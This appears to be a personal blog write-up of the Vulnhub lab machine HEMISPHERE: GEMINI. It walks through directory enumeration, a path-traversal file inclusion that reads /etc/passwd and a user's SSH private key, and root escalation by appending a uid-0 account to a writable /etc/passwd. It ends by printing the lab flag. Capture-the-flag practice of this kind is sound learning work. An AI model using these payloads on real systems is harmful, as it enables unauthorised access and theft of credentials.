---
layout: post
title:  "Vulnhub - HEMISPHERE: GEMINI"
date:   2020-11-13 14:00:00 +1100
category: hacking
---

## Prelude
Since my last post I did *Brute It* on THM and more or less finished *TommyBoy* from Vulnhub, although I had to consult a write-up for a hint or two on that one. I did most of it myself. I probably won't write a post about it.

## Introduction
*Difficulty: Easy  
Flag: 2 (user & root)  
Enumeration | Web Application | Privilege Escalation  
This works better with VirtualBox rather than VMware*  

This is [HEMISPHERE: GEMINI](https://www.vulnhub.com/entry/hemisphere-gemini,596/) from Vulnhub. 

## Ports
This one has FTP, SSH, HTTP and SMB, all on their standard ports. However FTP doesn't support anonymous login and there is nothing obviously available via SMB so they are both distractions. We move forward with HTTP.

## HTTP
robots.txt has three disallowed entries, and none of them exist lol.

Gobuster leads the way:

``
root@kali:/opt/vulnhub/gemini# gobuster dir -u http://192.168.1.132 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
``

This gets a directory called */Portal* which has an index page like this:

>http://192.168.1.132/Portal/index.php?view=about-us.html

It was presumably intentional with the **view** parameter but my first thought was LFI, and it was correct:

``
http://192.168.1.132/Portal/index.php?view=../../../../../../../../../../etc/passwd
``

This works, and we have a user called *william*. Probably it's not as simple as this, right?

``
http://192.168.1.132/Portal/index.php?view=../../../../../../../../../../../home/william/.ssh/id_rsa
``

Actually, it is.

{% highlight shell %}
root@kali:/opt/vulnhub/gemini# ssh -i id_rsa william@192.168.1.132
The authenticity of host '192.168.1.132 (192.168.1.132)' can't be established.
ECDSA key fingerprint is SHA256:WJJG9C/ZF8ojVDQF40UEgPCGZMEGwny3luZufN5+K30.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.132' (ECDSA) to the list of known hosts.
Linux gemini 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

ASCII ART REMOVED

william@gemini:~$ pwd
{% endhighlight %}

## Privesc
Linpeas says */etc/passwd* is writeable. We know what to do with that!

{% highlight shell %}
william@gemini:/dev/shm$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
william@gemini:/dev/shm$ su root2
Contraseña: 
root@gemini:/dev/shm# cd /root
root@gemini:~# ls
root.txt
root@gemini:~# cat root.txt 
root_flag==> vD1JA8mze74XzkmzOA21R4sjZ
{% endhighlight %}

Short, sweet, and done.
